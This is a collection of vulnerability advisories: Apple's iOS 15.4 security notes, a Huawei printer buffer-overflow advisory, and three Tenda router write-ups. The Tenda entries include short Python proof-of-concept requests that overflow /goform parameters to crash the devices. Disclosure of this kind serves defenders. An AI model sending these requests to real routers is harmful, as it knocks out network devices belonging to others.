**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22635: an anonymous researcher

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22636: an anonymous researcher

**Cellular**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access may be able to view and modify the carrier account information and settings from the lock screen

Description: The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel.

CVE-2022-22652: Kağan Eğlence (linkedin.com/in/kaganeglence), Oğuz Kırat (@oguzkirat)

Entry updated May 25, 2022

**CoreMedia**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to learn information about the current camera view before being granted camera access

Description: An issue with app access to camera metadata was addressed with improved logic.

CVE-2022-22598: Will Blaschko of Team Quasko

**CoreTypes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may bypass Gatekeeper checks

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2022-22663: Arsenii Kostromin (0x3c3e)

Entry added May 25, 2022

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22642: Yicong Ding (@AntonioDing)

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22667: Justin Sherman of the University of Maryland, Baltimore County

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**IOGPUFamily**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**iTunes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to access information about the user and their devices

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22653: Aymeric Chaib of CERT Banque de France

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22596: an anonymous researcher

CVE-2022-22640: sqrtpwn

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**libarchive**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**LLVM**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to delete files for which it does not have permission

Description: A race condition was addressed with additional validation.

CVE-2022-21658: Florian Weimer (@fweimer)

Entry added May 25, 2022

**Markup**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22622: Ingyu Lim (@\_kanarena)

**MediaRemote**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to identify what other applications a user has installed

Description: An access issue was addressed with improved access restrictions.

CVE-2022-22670: Brandon Azad

**MobileAccessoryUpdater**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22672: Siddharth Aeri (@b1n4r1b01)

Entry added May 25, 2022

**NetworkExtension**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged network position may be able to leak sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2022-22659: George Chen Kaidi of PayPal

Entry updated May 25, 2022

**Phone**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22618: Yicong Ding (@AntonioDing)

**Preferences**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Sandbox**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran

Entry updated May 25, 2022

**Siri**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)

Entry updated May 25, 2022

**SoftwareUpdate**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey (@patch1t)

**UIKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**VoiceOver**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22671: videosdebarraquito

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

Entry added May 25, 2022

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

CVE-2022-22668: About the security content of iOS 15.4 and iPadOS 15.4

There is a buffer overflow vulnerability in BiSheng-WNM FW 3.0.0.325. Successful exploitation could lead to device service exceptions.

A Huawei printer product has a buffer overflow vulnerability. Successful exploitation could lead to device service exceptions. (Vulnerability ID:HWPSIRT-2022-17649)   
This vulnerability has been assigned a (CVE) ID: CVE-2022-48260

Affected Product

Affected Version

Resolved Versions

BiSheng-WNM

BiSheng-WNM FW 3.0.0.325

BiSheng-WNM FW 3.0.0.327

HWPSIRT-2022-17649:  
Successful exploitation could lead to device service exceptions.

Vulnerabilities are scored base on the CVSS v3.1 scoring system. For details please refer to: http://www.first.org/cvss/specification-document.

HWPSIRT-2022-17649:  
Base score:7.5  
Temporary score:7.0  
Environmental Score:NA  
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C

HWPSIRT-2022-17649:  
This vulnerability can be exploited only when the following conditions are present:   
Attackers can access device network ports.  
Technical details:  
A Huawei printer product has a buffer overflow vulnerability. Attackers who can access network ports can construct malicious packets to exploit this vulnerability. Successful exploitation could lead to device service exceptions.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.

HWPSIRT-2022-17649:

This vulnerability was discovered by Huawei internal tester.

2023-01-18 V1.0 Initial Release;

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

CVE-2022-48260: Security Advisory - Buffer Overflow Vulnerability in a Huawei Printer Product

Tenda Router W30E V1.0.1.25(633) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.

**Tenda Router W30E Vulnerability**

This vulnerability lies in the /goform/RouteStatic page which influences the lastest version of Tenda Router W30E. (The latest version is W30E\_V1.0.1.25(633))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromRouteStatic.

In function fromRouteStatic it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/RouteStatic, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/RouteStatic?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline**

2023-01-30: Report to CVE;

**Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25231: Vluninfo_Repo/CNVDs/104 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function formOneSsidCfgSet via parameter ssid.

**Tenda Router AC500 Vulnerability**

This vulnerability lies in the /goform/setOneSsidCfg page which influences the lastest version of Tenda Router AC500. (The latest version is AC500\_V2.0.1.9(1307))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function formOneSsidCfgSet.

In function formOneSsidCfgSet it reads user provided parameter ssid into src, and this variable is passed into function strcpywithout any length check, which may overflow the stack-based buffers\`. 

So by requesting the page /goform/setOneSsidCfg, the attacker can easily perform a Deny of Service Attack.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/setOneSsidCfg?"
    url += "ssid=" + "s" * 100
    
    response = requests.get(url)
    

**Timeline****Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25235: Vluninfo_Repo/CNVDs/113_2 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.

**Tenda AC500 Vulnerability**

This vulnerability lies in the /goform/RouteStatic page which influences the lastest version of Tenda AC500. (The latest version is AC500\_V2.0.1.9(1307))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromRouteStatic.

In function fromRouteStatic it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/RouteStatic, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/RouteStatic?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline****Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25233: Vluninfo_Repo/CNVDs/113 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.

**Tenda Router AC500 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC500. (The latest version is AC500\_V2.0.1.9(1307))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/addressNat?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline****Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

Tag

#buffer_overflow